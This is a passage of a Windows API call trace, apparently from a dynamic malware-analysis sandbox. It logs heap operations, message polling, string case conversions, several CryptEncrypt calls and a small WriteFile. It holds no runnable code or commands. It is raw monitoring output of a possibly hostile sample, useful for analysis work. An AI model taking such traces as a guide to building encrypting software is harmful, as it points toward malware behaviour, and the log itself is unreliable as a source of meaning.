wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74160 | out: hHeap=0x2af0000) returned 1 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0216.096] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0216.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0216.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0216.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0216.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0216.096] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0216.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0216.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8d8 [0216.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0216.097] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0216.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0216.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0216.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0216.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0216.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0216.097] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0216.097] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0216.097] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0216.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0216.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0216.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0216.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0216.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0216.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaba88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0216.100] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0216.100] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.101] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.101] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.101] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.101] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0216.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0216.101] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71ec8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71ec8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.102] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0216.102] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.102] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0216.102] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.102] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0216.102] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.102] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0216.102] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.102] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0216.102] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.102] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0216.102] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.102] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.103] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.103] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.103] WriteFile (in: hFile=0x504, lpBuffer=0x2a71de8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71de8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0216.103] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.104] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.104] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0216.104] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.104] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0216.104] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.104] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.104] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.104] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0216.104] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.104] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0216.104] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0216.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: 